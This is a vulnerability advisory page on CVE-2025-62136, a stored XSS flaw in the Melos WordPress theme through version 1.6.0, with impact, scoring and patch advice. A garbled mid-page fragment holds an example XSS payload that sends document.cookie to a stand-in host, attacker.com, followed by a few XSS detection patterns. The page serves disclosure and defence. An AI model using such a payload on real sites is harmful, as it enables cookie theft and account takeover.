
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62136 is a Stored Cross-Site Scripting (XSS) vulnerability in the Melos WordPress theme developed by thinkupthemes. It affects all versions of the Melos theme up to and including version 1.6.0, and was first published on December 31, 2025, with the CVE record submitted by Patchstack. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium), assigned by Patchstack (Patchstack, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), meaning the Melos theme fails to properly sanitize or escape user-supplied input before rendering it in web pages. This allows an authenticated, low-privileged attacker to inject and persistently store malicious JavaScript payloads within the theme's functionality, which are then executed in the browsers of other users who view the affected content. The attack vector is network-based, requires low privileges and user interaction (a victim must view the injected content), and has a changed scope, meaning the impact crosses the security boundary of the vulnerable component (Patchstack, Red Hat CVE).
Successful exploitation allows an authenticated attacker to inject persistent malicious scripts that execute in the context of other users' browsers, including administrators. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims, and potential site takeover if an administrator's session is hijacked. The CVSS scope is marked as "Changed," indicating the impact extends beyond the vulnerable component to affect other users of the WordPress site (Patchstack, Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-62136. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with at least low-level privileges on the target WordPress site (Red Hat CVE, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>) into the vulnerable field and save/submit the content.<script>, onerror=, onload=).Site administrators should update the Melos theme to version 1.6.1 or later, which contains the fix for this stored XSS vulnerability. Until patching is possible, consider restricting theme-specific input capabilities to trusted users only, or temporarily deactivating the Melos theme and switching to an alternative. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide additional mitigation while awaiting an update (Patchstack, Red Hat CVE).
The vulnerability was reported and disclosed by Patchstack, which submitted the CVE on December 31, 2025. Sucuri included it in their January 2026 vulnerability patch roundup, indicating routine coverage within the WordPress security community (Sucuri Blog). No significant broader media coverage or notable researcher commentary beyond standard vulnerability tracking has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."